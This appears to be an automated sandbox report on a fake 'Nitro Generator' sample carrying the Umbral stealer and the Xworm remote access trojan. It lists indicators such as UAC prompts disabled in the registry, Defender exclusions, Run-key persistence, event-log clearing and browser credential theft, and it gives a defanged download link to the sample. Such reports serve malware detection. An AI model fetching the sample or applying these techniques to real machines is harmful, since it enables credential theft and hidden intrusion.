umbral | hxxps://mega[.]nz/file/7cdxFK4L#Io2Hue4hwSOKhugcwhvAvNvz7ViKQqmBYX7YynYEe58

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\conSEntPrompTbeHavIoRADMIN = "0"	powershell.exe

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Blocklisted process makes network request 6 IoCs

flow	pid	Process
104	736	powershell.exe
105	736	powershell.exe
107	736	powershell.exe
109	736	powershell.exe
112	736	powershell.exe
115	736	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
5436	powershell.exe
5232	powershell.exe
5660	powershell.exe
5804	powershell.exe
1460	powershell.EXE

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation	Nitro Generator.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Nitro Generator.lnk	Nitro Generator.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Nitro Generator.lnk	Nitro Generator.exe

Executes dropped EXE 8 IoCs

pid	Process
5636	Nitro Generator.exe
3016	Nitro Generator.exe
1308	Nitro Generator.exe
1648	Nitro Generator.exe
3484	ukLAj.EXE
392	rQHBDWIQ.exe
1940	sVUZSib0.exe
3968	wkKy3.exE

Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs

Clear Windows Event Logs to hide the activity of an intrusion.

defense_evasion

Clear Windows Event Logs

T1070.001

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe

Loads dropped DLL 1 IoCs

pid	Process
5636	Nitro Generator.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nitro Generator = "C:\\Users\\Admin\\AppData\\Roaming\\Nitro Generator.exe"	Nitro Generator.exe

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
118	ip-api.com
141	ip-api.com

Drops file in System32 directory 12 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\WindowsUpdate\Scheduled Start	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	svchost.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1460 set thread context of 5500	1460	powershell.EXE	163

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk	svchost.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ukLAj.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wkKy3.exE

Checks processor information in registry 2 TTPs 7 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	mousocoreworker.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	mousocoreworker.exe

Enumerates system info in registry 2 TTPs 8 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	mousocoreworker.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\18ae2d12_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\3 = 04000000000000000000803f000000000000000000000000	svchost.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\18ae2d12_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\4 = 0420000000000000180000000000000000000000000000000000803f0000803f	svchost.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\18ae2d12_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\5 = 0b0000000000000000000000000000000000000000000000	svchost.exe

Modifies data under HKEY_USERS 57 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133721103552392468"	chrome.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE

Modifies registry class 4 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\Local Settings	OpenWith.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2496	chrome.exe
2496	chrome.exe
5528	msedge.exe
5528	msedge.exe
3056	msedge.exe
3056	msedge.exe
5436	powershell.exe
5436	powershell.exe
5436	powershell.exe
5232	powershell.exe
5232	powershell.exe
5232	powershell.exe
5660	powershell.exe
5660	powershell.exe
5660	powershell.exe
3968	chrome.exe
3968	chrome.exe
3968	chrome.exe
3968	chrome.exe
736	powershell.exe
736	powershell.exe
736	powershell.exe
5804	powershell.exe
5804	powershell.exe
5804	powershell.exe
3484	ukLAj.EXE
3484	ukLAj.EXE
3484	ukLAj.EXE
3484	ukLAj.EXE
392	rQHBDWIQ.exe
392	rQHBDWIQ.exe
392	rQHBDWIQ.exe
392	rQHBDWIQ.exe
1460	powershell.EXE
1460	powershell.EXE
1460	powershell.EXE
1460	powershell.EXE
5500	dllhost.exe
5500	dllhost.exe
5500	dllhost.exe
5500	dllhost.exe
5500	dllhost.exe
5500	dllhost.exe
4156	wmiprvse.exe
4156	wmiprvse.exe
4156	wmiprvse.exe
4156	wmiprvse.exe
4156	wmiprvse.exe
4156	wmiprvse.exe
4156	wmiprvse.exe
5500	dllhost.exe
5500	dllhost.exe
5500	dllhost.exe
5500	dllhost.exe
5500	dllhost.exe
5500	dllhost.exe
5500	dllhost.exe
5500	dllhost.exe
1156	WerFault.exe
1156	WerFault.exe
5500	dllhost.exe
5500	dllhost.exe
5976	svchost.exe
5976	svchost.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
1576	OpenWith.exe
5512	OpenWith.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs

pid	Process
2496	chrome.exe
2496	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2496	chrome.exe
Token: SeCreatePagefilePrivilege	2496	chrome.exe
Token: SeShutdownPrivilege	2496	chrome.exe
Token: SeCreatePagefilePrivilege	2496	chrome.exe
Token: SeShutdownPrivilege	2496	chrome.exe
Token: SeCreatePagefilePrivilege	2496	chrome.exe
Token: SeShutdownPrivilege	2496	chrome.exe
Token: SeCreatePagefilePrivilege	2496	chrome.exe
Token: SeShutdownPrivilege	2496	chrome.exe
Token: SeCreatePagefilePrivilege	2496	chrome.exe
Token: 33	1256	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1256	AUDIODG.EXE
Token: SeShutdownPrivilege	2496	chrome.exe
Token: SeCreatePagefilePrivilege	2496	chrome.exe
Token: SeShutdownPrivilege	2496	chrome.exe
Token: SeCreatePagefilePrivilege	2496	chrome.exe
Token: SeShutdownPrivilege	2496	chrome.exe
Token: SeCreatePagefilePrivilege	2496	chrome.exe
Token: SeShutdownPrivilege	2496	chrome.exe
Token: SeCreatePagefilePrivilege	2496	chrome.exe
Token: SeShutdownPrivilege	2496	chrome.exe
Token: SeCreatePagefilePrivilege	2496	chrome.exe
Token: SeShutdownPrivilege	2496	chrome.exe
Token: SeCreatePagefilePrivilege	2496	chrome.exe
Token: SeShutdownPrivilege	2496	chrome.exe
Token: SeCreatePagefilePrivilege	2496	chrome.exe
Token: SeShutdownPrivilege	2496	chrome.exe
Token: SeCreatePagefilePrivilege	2496	chrome.exe
Token: SeShutdownPrivilege	2496	chrome.exe
Token: SeCreatePagefilePrivilege	2496	chrome.exe
Token: SeShutdownPrivilege	2496	chrome.exe
Token: SeCreatePagefilePrivilege	2496	chrome.exe
Token: SeShutdownPrivilege	2496	chrome.exe
Token: SeCreatePagefilePrivilege	2496	chrome.exe
Token: SeShutdownPrivilege	2496	chrome.exe
Token: SeCreatePagefilePrivilege	2496	chrome.exe
Token: SeShutdownPrivilege	2496	chrome.exe
Token: SeCreatePagefilePrivilege	2496	chrome.exe
Token: SeShutdownPrivilege	2496	chrome.exe
Token: SeCreatePagefilePrivilege	2496	chrome.exe
Token: SeShutdownPrivilege	2496	chrome.exe
Token: SeCreatePagefilePrivilege	2496	chrome.exe
Token: SeShutdownPrivilege	2496	chrome.exe
Token: SeCreatePagefilePrivilege	2496	chrome.exe
Token: SeShutdownPrivilege	2496	chrome.exe
Token: SeCreatePagefilePrivilege	2496	chrome.exe
Token: SeShutdownPrivilege	2496	chrome.exe
Token: SeCreatePagefilePrivilege	2496	chrome.exe
Token: SeShutdownPrivilege	2496	chrome.exe
Token: SeCreatePagefilePrivilege	2496	chrome.exe
Token: SeShutdownPrivilege	2496	chrome.exe
Token: SeCreatePagefilePrivilege	2496	chrome.exe
Token: SeShutdownPrivilege	2496	chrome.exe
Token: SeCreatePagefilePrivilege	2496	chrome.exe
Token: SeShutdownPrivilege	2496	chrome.exe
Token: SeCreatePagefilePrivilege	2496	chrome.exe
Token: SeShutdownPrivilege	2496	chrome.exe
Token: SeCreatePagefilePrivilege	2496	chrome.exe
Token: SeRestorePrivilege	2492	7zG.exe
Token: 35	2492	7zG.exe
Token: SeSecurityPrivilege	2492	7zG.exe
Token: SeSecurityPrivilege	2492	7zG.exe
Token: SeShutdownPrivilege	2496	chrome.exe
Token: SeCreatePagefilePrivilege	2496	chrome.exe

Suspicious use of FindShellTrayWindow 35 IoCs

pid	Process
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2492	7zG.exe
5020	7zG.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe
2496	chrome.exe

Suspicious use of SetWindowsHookEx 64 IoCs

pid	Process
1576	OpenWith.exe
1576	OpenWith.exe
1576	OpenWith.exe
1576	OpenWith.exe
1576	OpenWith.exe
1576	OpenWith.exe
1576	OpenWith.exe
1576	OpenWith.exe
1576	OpenWith.exe
1576	OpenWith.exe
1576	OpenWith.exe
1576	OpenWith.exe
1576	OpenWith.exe
1576	OpenWith.exe
1576	OpenWith.exe
1576	OpenWith.exe
1576	OpenWith.exe
1576	OpenWith.exe
1576	OpenWith.exe
1576	OpenWith.exe
1576	OpenWith.exe
1576	OpenWith.exe
1576	OpenWith.exe
1576	OpenWith.exe
1576	OpenWith.exe
5512	OpenWith.exe
5512	OpenWith.exe
5512	OpenWith.exe
5512	OpenWith.exe
5512	OpenWith.exe
5512	OpenWith.exe
5512	OpenWith.exe
5512	OpenWith.exe
5512	OpenWith.exe
5512	OpenWith.exe
5512	OpenWith.exe
5512	OpenWith.exe
5512	OpenWith.exe
5512	OpenWith.exe
5512	OpenWith.exe
5512	OpenWith.exe
5512	OpenWith.exe
5512	OpenWith.exe
5512	OpenWith.exe
5512	OpenWith.exe
5512	OpenWith.exe
5512	OpenWith.exe
5512	OpenWith.exe
5512	OpenWith.exe
5512	OpenWith.exe
5512	OpenWith.exe
5512	OpenWith.exe
5512	OpenWith.exe
5512	OpenWith.exe
5512	OpenWith.exe
5512	OpenWith.exe
5512	OpenWith.exe
5512	OpenWith.exe
5512	OpenWith.exe
5512	OpenWith.exe
5512	OpenWith.exe
5512	OpenWith.exe
5512	OpenWith.exe
5512	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2496 wrote to memory of 4244	2496	chrome.exe	82
PID 2496 wrote to memory of 4244	2496	chrome.exe	82
PID 2496 wrote to memory of 3960	2496	chrome.exe	83
PID 2496 wrote to memory of 3960	2496	chrome.exe	83
PID 2496 wrote to memory of 3960	2496	chrome.exe	83
PID 2496 wrote to memory of 3960	2496	chrome.exe	83
PID 2496 wrote to memory of 3960	2496	chrome.exe	83
PID 2496 wrote to memory of 3960	2496	chrome.exe	83
PID 2496 wrote to memory of 3960	2496	chrome.exe	83
PID 2496 wrote to memory of 3960	2496	chrome.exe	83
PID 2496 wrote to memory of 3960	2496	chrome.exe	83
PID 2496 wrote to memory of 3960	2496	chrome.exe	83
PID 2496 wrote to memory of 3960	2496	chrome.exe	83
PID 2496 wrote to memory of 3960	2496	chrome.exe	83
PID 2496 wrote to memory of 3960	2496	chrome.exe	83
PID 2496 wrote to memory of 3960	2496	chrome.exe	83
PID 2496 wrote to memory of 3960	2496	chrome.exe	83
PID 2496 wrote to memory of 3960	2496	chrome.exe	83
PID 2496 wrote to memory of 3960	2496	chrome.exe	83
PID 2496 wrote to memory of 3960	2496	chrome.exe	83
PID 2496 wrote to memory of 3960	2496	chrome.exe	83
PID 2496 wrote to memory of 3960	2496	chrome.exe	83
PID 2496 wrote to memory of 3960	2496	chrome.exe	83
PID 2496 wrote to memory of 3960	2496	chrome.exe	83
PID 2496 wrote to memory of 3960	2496	chrome.exe	83
PID 2496 wrote to memory of 3960	2496	chrome.exe	83
PID 2496 wrote to memory of 3960	2496	chrome.exe	83
PID 2496 wrote to memory of 3960	2496	chrome.exe	83
PID 2496 wrote to memory of 3960	2496	chrome.exe	83
PID 2496 wrote to memory of 3960	2496	chrome.exe	83
PID 2496 wrote to memory of 3960	2496	chrome.exe	83
PID 2496 wrote to memory of 3960	2496	chrome.exe	83
PID 2496 wrote to memory of 1776	2496	chrome.exe	84
PID 2496 wrote to memory of 1776	2496	chrome.exe	84
PID 2496 wrote to memory of 4592	2496	chrome.exe	85
PID 2496 wrote to memory of 4592	2496	chrome.exe	85
PID 2496 wrote to memory of 4592	2496	chrome.exe	85
PID 2496 wrote to memory of 4592	2496	chrome.exe	85
PID 2496 wrote to memory of 4592	2496	chrome.exe	85
PID 2496 wrote to memory of 4592	2496	chrome.exe	85
PID 2496 wrote to memory of 4592	2496	chrome.exe	85
PID 2496 wrote to memory of 4592	2496	chrome.exe	85
PID 2496 wrote to memory of 4592	2496	chrome.exe	85
PID 2496 wrote to memory of 4592	2496	chrome.exe	85
PID 2496 wrote to memory of 4592	2496	chrome.exe	85
PID 2496 wrote to memory of 4592	2496	chrome.exe	85
PID 2496 wrote to memory of 4592	2496	chrome.exe	85
PID 2496 wrote to memory of 4592	2496	chrome.exe	85
PID 2496 wrote to memory of 4592	2496	chrome.exe	85
PID 2496 wrote to memory of 4592	2496	chrome.exe	85
PID 2496 wrote to memory of 4592	2496	chrome.exe	85
PID 2496 wrote to memory of 4592	2496	chrome.exe	85
PID 2496 wrote to memory of 4592	2496	chrome.exe	85
PID 2496 wrote to memory of 4592	2496	chrome.exe	85
PID 2496 wrote to memory of 4592	2496	chrome.exe	85
PID 2496 wrote to memory of 4592	2496	chrome.exe	85
PID 2496 wrote to memory of 4592	2496	chrome.exe	85
PID 2496 wrote to memory of 4592	2496	chrome.exe	85
PID 2496 wrote to memory of 4592	2496	chrome.exe	85
PID 2496 wrote to memory of 4592	2496	chrome.exe	85
PID 2496 wrote to memory of 4592	2496	chrome.exe	85
PID 2496 wrote to memory of 4592	2496	chrome.exe	85
PID 2496 wrote to memory of 4592	2496	chrome.exe	85
PID 2496 wrote to memory of 4592	2496	chrome.exe	85

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:612
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:1020
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{1ea4b04f-8686-4485-94b6-e680f8abb971}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5500

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:668

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:948

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1012

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
